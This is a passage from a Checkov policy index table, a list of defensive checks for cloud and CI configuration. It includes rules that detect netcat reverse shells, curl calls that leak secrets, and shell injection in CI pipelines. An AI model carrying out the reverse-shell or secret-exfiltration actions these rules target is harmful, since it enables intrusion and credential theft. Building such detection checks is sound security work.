[GCPContainerRegistryReposAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPContainerRegistryReposAreNotPubliclyAccessible.yaml) | -| 2332 | CKV2_GCP_9 | resource | google_storage_bucket_iam_member | Ensure that Container Registry repositories are not anonymously or publicly accessible | Terraform | [GCPContainerRegistryReposAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPContainerRegistryReposAreNotPubliclyAccessible.yaml) | -| 2333 | CKV2_GCP_10 | resource | google_cloudfunctions_function | Ensure GCP Cloud Function HTTP trigger is secured | Terraform | [CloudFunctionSecureHTTPTrigger.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/CloudFunctionSecureHTTPTrigger.yaml) | -| 2334 | CKV2_GCP_11 | resource | 
google_project_services | Ensure GCP GCR Container Vulnerability Scanning is enabled | Terraform | [GCRContainerVulnerabilityScanningEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCRContainerVulnerabilityScanningEnabled.yaml) | -| 2335 | CKV2_GCP_12 | resource | google_compute_firewall | Ensure GCP compute firewall ingress does not allow unrestricted access to all ports | Terraform | [GCPComputeFirewallOverlyPermissiveToAllTraffic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPComputeFirewallOverlyPermissiveToAllTraffic.yaml) | -| 2336 | CKV2_GCP_13 | resource | google_sql_database_instance | Ensure PostgreSQL database flag 'log_duration' is set to 'on' | Terraform | [GCPPostgreSQLDatabaseFlaglog_durationIsSetToON.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_durationIsSetToON.yaml) | -| 2337 | CKV2_GCP_14 | resource | google_sql_database_instance | Ensure PostgreSQL database flag 'log_executor_stats' is set to 'off' | Terraform | [GCPPostgreSQLDatabaseFlaglog_executor_statsIsSetToOFF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_executor_statsIsSetToOFF.yaml) | -| 2338 | CKV2_GCP_15 | resource | google_sql_database_instance | Ensure PostgreSQL database flag 'log_parser_stats' is set to 'off' | Terraform | [GCPPostgreSQLDatabaseFlaglog_parser_statsIsSetToOFF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_parser_statsIsSetToOFF.yaml) | -| 2339 | CKV2_GCP_16 | resource | google_sql_database_instance | Ensure PostgreSQL database flag 'log_planner_stats' is set to 'off' | Terraform | 
[GCPPostgreSQLDatabaseFlaglog_planner_statsIsSetToOFF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_planner_statsIsSetToOFF.yaml) | -| 2340 | CKV2_GCP_17 | resource | google_sql_database_instance | Ensure PostgreSQL database flag 'log_statement_stats' is set to 'off' | Terraform | [GCPPostgreSQLDatabaseFlaglog_statement_statsIsSetToOFF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_statement_statsIsSetToOFF.yaml) | -| 2341 | CKV2_GCP_18 | resource | google_compute_network | Ensure GCP network defines a firewall and does not use the default firewall | Terraform | [GCPNetworkDoesNotUseDefaultFirewall.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPNetworkDoesNotUseDefaultFirewall.yaml) | -| 2342 | CKV2_GCP_19 | resource | google_container_cluster | Ensure GCP Kubernetes engine clusters have 'alpha cluster' feature disabled | Terraform | [GCPdisableAlphaClusterFeatureInKubernetesEngineClusters.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPdisableAlphaClusterFeatureInKubernetesEngineClusters.yaml) | -| 2343 | CKV2_GCP_20 | resource | google_sql_database_instance | Ensure MySQL DB instance has point-in-time recovery backup configured | Terraform | [GCPMySQLdbInstancePoint_In_TimeRecoveryBackupIsEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPMySQLdbInstancePoint_In_TimeRecoveryBackupIsEnabled.yaml) | -| 2344 | CKV2_GCP_21 | resource | google_notebooks_instance | Ensure Vertex AI instance disks are encrypted with a Customer Managed Key (CMK) | Terraform | [GCPVertexInstanceEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexInstanceEncryptedWithCMK.yaml) | -| 2345 | 
CKV2_GCP_22 | resource | google_document_ai_processor | Ensure Document AI Processors are encrypted with a Customer Managed Key (CMK) | Terraform | [GCPDocumentAIProcessorEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDocumentAIProcessorEncryptedWithCMK.yaml) | -| 2346 | CKV2_GCP_23 | resource | google_document_ai_warehouse_location | Ensure Document AI Warehouse Location is configured to use a Customer Managed Key (CMK) | Terraform | [GCPDocumentAIWarehouseLocationEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDocumentAIWarehouseLocationEncryptedWithCMK.yaml) | -| 2347 | CKV2_GCP_24 | resource | google_vertex_ai_endpoint | Ensure Vertex AI endpoint uses a Customer Managed Key (CMK) | Terraform | [GCPVertexAIEndpointEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAIEndpointEncryptedWithCMK.yaml) | -| 2348 | CKV2_GCP_25 | resource | google_vertex_ai_featurestore | Ensure Vertex AI featurestore uses a Customer Managed Key (CMK) | Terraform | [GCPVertexAIFeaturestoreEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAIFeaturestoreEncryptedWithCMK.yaml) | -| 2349 | CKV2_GCP_26 | resource | google_vertex_ai_tensorboard | Ensure Vertex AI tensorboard uses a Customer Managed Key (CMK) | Terraform | [GCPVertexAITensorboardEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAITensorboardEncryptedWithCMK.yaml) | -| 2350 | CKV2_GCP_27 | resource | google_workbench_instance | Ensure Vertex AI workbench instance disks are encrypted with a Customer Managed Key (CMK) | Terraform | 
[GCPVertexWorkbenchInstanceEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexWorkbenchInstanceEncryptedWithCMK.yaml) | -| 2351 | CKV2_GCP_28 | resource | google_workbench_instance | Ensure Vertex AI workbench instances are private | Terraform | [GCPVertexWorkbenchInstanceNoPublicIp.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexWorkbenchInstanceNoPublicIp.yaml) | -| 2352 | CKV2_GCP_29 | resource | google_dialogflow_agent | Ensure logging is enabled for Dialogflow agents | Terraform | [GCPDialogFlowAgentLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDialogFlowAgentLoggingEnabled.yaml) | -| 2353 | CKV2_GCP_30 | resource | google_dialogflow_cx_agent | Ensure logging is enabled for Dialogflow CX agents | Terraform | [GCPDialogFlowCxAgentLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDialogFlowCxAgentLoggingEnabled.yaml) | -| 2354 | CKV2_GCP_31 | resource | google_dialogflow_cx_webhook | Ensure logging is enabled for Dialogflow CX webhooks | Terraform | [GCPDialogFlowCxWebhookLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDialogFlowCxWebhookLoggingEnabled.yaml) | -| 2355 | CKV2_GCP_32 | resource | google_tpu_v2_vm | Ensure TPU v2 is private | Terraform | [GCPTpuV2VmPrivateEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPTpuV2VmPrivateEndpoint.yaml) | -| 2356 | CKV2_GCP_33 | resource | google_vertex_ai_endpoint | Ensure Vertex AI endpoint is private | Terraform | [GCPVertexAIPrivateEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAIPrivateEndpoint.yaml) | -| 2357 | CKV2_GCP_34 | resource | 
google_vertex_ai_index_endpoint | Ensure Vertex AI index endpoint is private | Terraform | [GCPVertexAIPrivateIndexEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAIPrivateIndexEndpoint.yaml) | -| 2358 | CKV2_GCP_35 | resource | google_notebooks_runtime | Ensure Vertex AI runtime is encrypted with a Customer Managed Key (CMK) | Terraform | [GCPVertexRuntimeEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexRuntimeEncryptedWithCMK.yaml) | -| 2359 | CKV2_GCP_36 | resource | google_notebooks_runtime | Ensure Vertex AI runtime is private | Terraform | [GCPVertexRuntimePrivate.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexRuntimePrivate.yaml) | -| 2360 | CKV_GHA_1 | jobs | jobs | Ensure ACTIONS_ALLOW_UNSECURE_COMMANDS isn't true on environment variables | github_actions | [AllowUnsecureCommandsOnJob.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/AllowUnsecureCommandsOnJob.py) | -| 2361 | CKV_GHA_1 | jobs | jobs.*.steps[] | Ensure ACTIONS_ALLOW_UNSECURE_COMMANDS isn't true on environment variables | github_actions | [AllowUnsecureCommandsOnJob.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/AllowUnsecureCommandsOnJob.py) | -| 2362 | CKV_GHA_2 | jobs | jobs | Ensure run commands are not vulnerable to shell injection | github_actions | [ShellInjection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/ShellInjection.py) | -| 2363 | CKV_GHA_2 | jobs | jobs.*.steps[] | Ensure run commands are not vulnerable to shell injection | github_actions | [ShellInjection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/ShellInjection.py) | -| 2364 | CKV_GHA_3 | jobs | jobs | Suspicious use of curl with secrets | github_actions | 
[SuspectCurlInScript.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/SuspectCurlInScript.py) | -| 2365 | CKV_GHA_3 | jobs | jobs.*.steps[] | Suspicious use of curl with secrets | github_actions | [SuspectCurlInScript.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/SuspectCurlInScript.py) | -| 2366 | CKV_GHA_4 | jobs | jobs | Suspicious use of netcat with IP address | github_actions | [ReverseShellNetcat.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/ReverseShellNetcat.py) | -| 2367 | CKV_GHA_4 | jobs | jobs.*.steps[] | Suspicious use of netcat with IP address | github_actions | [ReverseShellNetcat.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/ReverseShellNetcat.py) | -| 2368 | CKV_GHA_5 | jobs | jobs | Found artifact build without evidence of cosign sign execution in pipeline | github_actions | [CosignArtifacts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/CosignArtifacts.py) | -| 2369 | CKV_GHA_6 | jobs | jobs | Found artifact build without evidence of cosign sbom attestation in pipeline | github_actions | [CosignSBOM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/CosignSBOM.py) | -| 2370 | CKV_GHA_7 | jobs | on | The build output cannot be affected by user parameters other than the build entry point and the top-level source location. GitHub Actions workflow_dispatch inputs MUST be empty. 
| github_actions | [EmptyWorkflowDispatch.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/EmptyWorkflowDispatch.py) | -| 2371 | CKV2_GHA_1 | resource | permissions | Ensure top-level permissions are not set to write-all | github_actions | [ReadOnlyTopLevelPermissions.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/graph_checks/ReadOnlyTopLevelPermissions.yaml) | -| 2372 | CKV_GIT_1 | resource | github_repository | Ensure GitHub repository is Private | Terraform | [PrivateRepo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/PrivateRepo.py) | -| 2373 | CKV_GIT_2 | resource | github_repository_webhook | Ensure GitHub repository webhooks are using HTTPS | Terraform | [WebhookInsecureSsl.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/WebhookInsecureSsl.py) | -| 2374 | CKV_GIT_3 | resource | github_repository | Ensure GitHub repository has vulnerability alerts enabled | Terraform | [RepositoryEnableVulnerabilityAlerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/RepositoryEnableVulnerabilityAlerts.py) | -| 2375 | CKV_GIT_4 | resource | github_actions_environment_secret | Ensure GitHub Actions secrets are encrypted | Terraform | [SecretsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/SecretsEncrypted.py) | -| 2376 | CKV_GIT_4 | resource | github_actions_organization_secret | Ensure GitHub Actions secrets are encrypted | Terraform | [SecretsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/SecretsEncrypted.py) | -| 2377 | CKV_GIT_4 | resource | github_actions_secret | Ensure GitHub Actions secrets are encrypted | Terraform | 
[SecretsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/SecretsEncrypted.py) | -| 2378 | CKV_GIT_5 | resource | github_branch_protection | GitHub pull requests should require at least 2 approvals | Terraform | [BranchProtectionReviewNumTwo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/BranchProtectionReviewNumTwo.py) | -| 2379 | CKV_GIT_5 | resource | github_branch_protection_v3 | GitHub pull requests should require at least 2 approvals | Terraform | [BranchProtectionReviewNumTwo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/BranchProtectionReviewNumTwo.py) | -| 2380 | CKV_GIT_6 | resource | github_branch_protection | Ensure GitHub branch protection rules requires signed commits | Terraform | [BranchProtectionRequireSignedCommits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/BranchProtectionRequireSignedCommits.py) | -| 2381 | CKV_GIT_6 | resource | github_branch_protection_v3 | Ensure GitHub branch protection rules requires signed commits | Terraform | [BranchProtectionRequireSignedCommits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/BranchProtectionRequireSignedCommits.py) | -| 2382 | CKV2_GIT_1 | resource | github_repository | Ensure each Repository has branch protection associated | Terraform | [RepositoryHasBranchProtection.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/github/RepositoryHasBranchProtection.yaml) | -| 2383 | CKV_GITHUB_1 | github_configuration | * | Ensure GitHub organization security settings require 2FA | github_configuration | [2fa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/2fa.py) | -| 2384 | CKV_GITHUB_2 | github_configuration | * | Ensure GitHub organization security settings require SSO | github_configuration 
| [sso.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/sso.py) | -| 2385 | CKV_GITHUB_3 | github_configuration | * | Ensure GitHub organization security settings has IP allow list enabled | github_configuration | [ipallowlist.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/ipallowlist.py) | -| 2386 | CKV_GITHUB_4 | github_configuration | * | Ensure GitHub branch protection rules requires signed commits | github_configuration | [require_signatures.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_signatures.py) | -| 2387 | CKV_GITHUB_5 | github_configuration | * | Ensure GitHub branch protection rules does not allow force pushes | github_configuration | [disallow_force_pushes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/disallow_force_pushes.py) | -| 2388 | CKV_GITHUB_6 | github_configuration | * | Ensure GitHub organization webhooks are using HTTPS | github_configuration | [webhooks_https_orgs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/webhooks_https_orgs.py) | -| 2389 | CKV_GITHUB_7 | github_configuration | * | Ensure GitHub repository webhooks are using HTTPS | github_configuration | [webhooks_https_repos.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/webhooks_https_repos.py) | -| 2390 | CKV_GITHUB_8 | github_configuration | * | Ensure GitHub branch protection rules requires linear history | github_configuration | [require_linear_history.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_linear_history.py) | -| 2391 | CKV_GITHUB_9 | github_configuration | * | Ensure 2 admins are set for each repository | github_configuration | [repository_collaborators.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/repository_collaborators.py) | -| 2392 | CKV_GITHUB_10 | github_configuration | * | Ensure branch protection rules are 
enforced on administrators | github_configuration | [enforce_branch_protection_admins.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/enforce_branch_protection_admins.py) | -| 2393 | CKV_GITHUB_11 | github_configuration | * | Ensure GitHub branch protection dismisses stale review on new commit | github_configuration | [dismiss_stale_reviews.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/dismiss_stale_reviews.py) | -| 2394 | CKV_GITHUB_12 | github_configuration | * | Ensure GitHub branch protection restricts who can dismiss PR reviews | github_configuration | [restrict_pr_review_dismissal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/restrict_pr_review_dismissal.py) | -| 2395 | CKV_GITHUB_13 | github_configuration | * | Ensure GitHub branch protection requires CODEOWNER reviews | github_configuration | [require_code_owner_reviews.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_code_owner_reviews.py) | -| 2396 | CKV_GITHUB_14 | github_configuration | * | Ensure all checks have passed before the merge of new code | github_configuration | [require_status_checks_pr.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_status_checks_pr.py) | -| 2397 | CKV_GITHUB_15 | github_configuration | * | Ensure inactive branches are reviewed and removed periodically | github_configuration | [disallow_inactive_branch_60days.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/disallow_inactive_branch_60days.py) | -| 2398 | CKV_GITHUB_16 | github_configuration | * | Ensure GitHub branch protection requires conversation resolution | github_configuration | [require_conversation_resolution.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_conversation_resolution.py) | -| 2399 | CKV_GITHUB_17 | github_configuration | * | Ensure GitHub branch protection requires push restrictions | 
github_configuration | [require_push_restrictions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_push_restrictions.py) | -| 2400 | CKV_GITHUB_18 | github_configuration | * | Ensure GitHub branch protection rules does not allow deletions | github_configuration | [disallow_branch_deletions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/disallow_branch_deletions.py) | -| 2401 | CKV_GITHUB_19 | github_configuration | * | Ensure any change to code receives approval of two strongly authenticated users | github_configuration | [require_2approvals.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_2approvals.py) | -| 2402 | CKV_GITHUB_20 | github_configuration | * | Ensure open git branches are up to date before they can be merged into codebase | github_configuration | [require_updated_branch_pr.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_updated_branch_pr.py) | -| 2403 | CKV_GITHUB_21 | github_configuration | * | Ensure public repository creation is limited to specific members | github_configuration | [public_repository_creation_is_limited.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/public_repository_creation_is_limited.py) | -| 2404 | CKV_GITHUB_22 | github_configuration | * | Ensure private repository creation is limited to specific members | github_configuration | [private_repository_creation_is_limited.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/private_repository_creation_is_limited.py) | -| 2405 | CKV_GITHUB_23 | github_configuration | * | Ensure internal repository creation is limited to specific members | github_configuration | [internal_repository_creation_is_limited.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/internal_repository_creation_is_limited.py) | -| 2406 | CKV_GITHUB_26 | github_configuration | * | Ensure minimum admins are 
set for the organization | github_configuration | [minimum_admins_in_org.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/minimum_admins_in_org.py) | -| 2407 | CKV_GITHUB_27 | github_configuration | * | Ensure strict base permissions are set for repositories | github_configuration | [require_strict_base_permissions_repository.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_strict_base_permissions_repository.py) | -| 2408 | CKV_GITHUB_28 | github_configuration | * | Ensure an organization's identity is confirmed with a Verified badge Passed | github_configuration | [require_verified_organization.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_verified_organization.py) | -| 2409 | CKV_GITLAB_1 | gitlab_configuration | * | Merge requests should require at least 2 approvals | gitlab_configuration | [merge_requests_approvals.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/gitlab/checks/merge_requests_approvals.py) | -| 2410 | CKV_GITLAB_2 | gitlab_configuration | * | Ensure all Gitlab groups require two factor authentication | gitlab_configuration | [two_factor_authentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/gitlab/checks/two_factor_authentication.py) | -| 2411 | CKV_GITLABCI_1 | jobs | *.script[] | Suspicious use of curl with CI environment variables in script | gitlab_ci | [SuspectCurlInScript.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/gitlab_ci/checks/job/SuspectCurlInScript.py) | -| 2412 | CKV_GITLABCI_2 | jobs | *.rules | Avoid creating rules that generate double pipelines | gitlab_ci | [AvoidDoublePipelines.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/gitlab_ci/checks/job/AvoidDoublePipelines.py) | -| 2413 | CKV_GITLABCI_3 | jobs | *.image[] | Detecting image usages in gitlab workflows | gitlab_ci | 
[DetectImagesUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/gitlab_ci/checks/job/DetectImagesUsage.py) | -| 2414 | CKV_GITLABCI_3 | jobs | *.services[] | Detecting image usages in gitlab workflows | gitlab_ci | [DetectImagesUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/gitlab_ci/checks/job/DetectImagesUsage.py) | -| 2415 | CKV_GLB_1 | resource | gitlab_project | Ensure at least two approving reviews are required to merge a GitLab MR | Terraform | [RequireTwoApprovalsToMerge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gitlab/RequireTwoApprovalsToMerge.py) | -| 2416 | CKV_GLB_2 | resource | gitlab_branch_protection | Ensure GitLab branch protection rules does not allow force pushes | Terraform | [ForcePushDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gitlab/ForcePushDisabled.py) | -| 2417 | CKV_GLB_3 | resource | gitlab_project | Ensure GitLab prevent secrets is enabled | Terraform | [PreventSecretsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gitlab/PreventSecretsEnabled.py) | -| 2418 | CKV_GLB_4 | resource | gitlab_project | Ensure GitLab commits are signed | Terraform | [RejectUnsignedCommits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gitlab/RejectUnsignedCommits.py) | -| 2419 | CKV2_IBM_1 | resource | ibm_is_lb | Ensure load balancer for VPC is private (disable public access) | Terraform | [IBM_LoadBalancerforVPCisPrivate.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_LoadBalancerforVPCisPrivate.yaml) | -| 2420 | CKV2_IBM_2 | resource | ibm_is_vpc | Ensure VPC classic access is disabled | Terraform | [IBM_VPCclassicAccessIsDisabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_VPCclassicAccessIsDisabled.yaml) | -| 2421 | 
CKV2_IBM_3 | resource | ibm_iam_account_settings | Ensure API key creation is restricted in account settings | Terraform | [IBM_RestrictAPIkeyCreationInAccountSettings.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_RestrictAPIkeyCreationInAccountSettings.yaml) | -| 2422 | CKV2_IBM_4 | resource | ibm_iam_account_settings | Ensure Multi-Factor Authentication (MFA) is enabled at the account level | Terraform | [IBM_EnableMFAatAccountLevel.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_EnableMFAatAccountLevel.yaml) | -| 2423 | CKV2_IBM_5 | resource | ibm_iam_account_settings | Ensure Service ID creation is restricted in account settings | Terraform | [IBM_RestrictServiceIDCreationInAccountSettings.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_RestrictServiceIDCreationInAccountSettings.yaml) | -| 2424 | CKV2_IBM_6 | resource | ibm_database | Ensure Databases network access is restricted to a specific IP range | Terraform | [IBM_DatabasesNWaccessRestrictedToSpecificIPrange.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_DatabasesNWaccessRestrictedToSpecificIPrange.yaml) | -| 2425 | CKV2_IBM_7 | resource | ibm_container_cluster | Ensure Kubernetes clusters are accessible by using private endpoint and NOT public endpoint | Terraform | [IBM_K8sClustersAccessibleViaPrivateEndPt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_K8sClustersAccessibleViaPrivateEndPt.yaml) | -| 2426 | CKV_K8S_1 | resource | PodSecurityPolicy | Do not admit containers wishing to share the host process ID namespace | Kubernetes | [ShareHostPIDPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPIDPSP.py) | -| 2427 | CKV_K8S_1 | resource | kubernetes_pod_security_policy | Do not 
admit containers wishing to share the host process ID namespace | Terraform | [ShareHostPIDPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPIDPSP.py) | -| 2428 | CKV_K8S_2 | resource | PodSecurityPolicy | Do not admit privileged containers | Kubernetes | [PrivilegedContainersPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainersPSP.py) | -| 2429 | CKV_K8S_2 | resource | kubernetes_pod_security_policy | Do not admit privileged containers | Terraform | [PrivilegedContainerPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainerPSP.py) | -| 2430 | CKV_K8S_3 | resource | PodSecurityPolicy | Do not admit containers wishing to share the host IPC namespace | Kubernetes | [ShareHostIPCPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPCPSP.py) | -| 2431 | CKV_K8S_3 | resource | kubernetes_pod_security_policy | Do not admit containers wishing to share the host IPC namespace | Terraform | [ShareHostIPCPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPCPSP.py) | -| 2432 | CKV_K8S_4 | resource | PodSecurityPolicy | Do not admit containers wishing to share the host network namespace | Kubernetes | [SharedHostNetworkNamespacePSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespacePSP.py) | -| 2433 | CKV_K8S_4 | resource | kubernetes_pod_security_policy | Do not admit containers wishing to share the host network namespace | Terraform | [SharedHostNetworkNamespacePSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespacePSP.py) | -| 2434 | CKV_K8S_5 | resource | PodSecurityPolicy | Containers should not run with allowPrivilegeEscalation 
| Kubernetes | [AllowPrivilegeEscalationPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalationPSP.py) | -| 2435 | CKV_K8S_5 | resource | kubernetes_pod_security_policy | Containers should not run with allowPrivilegeEscalation | Terraform | [AllowPrivilegeEscalationPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalationPSP.py) | -| 2436 | CKV_K8S_6 | resource | PodSecurityPolicy | Do not admit root containers | Kubernetes | [RootContainersPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersPSP.py) | -| 2437 | CKV_K8S_6 | resource | kubernetes_pod_security_policy | Do not admit root containers | Terraform | [RootContainerPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/RootContainerPSP.py) | -| 2438 | CKV_K8S_7 | resource | PodSecurityPolicy | Do not admit containers with the NET_RAW capability | Kubernetes | [DropCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilitiesPSP.py) | -| 2439 | CKV_K8S_7 | resource | kubernetes_pod_security_policy | Do not admit containers with the NET_RAW capability | Terraform | [DropCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilitiesPSP.py) | -| 2440 | CKV_K8S_8 | resource | DaemonSet | Liveness Probe Should be Configured | Kubernetes | 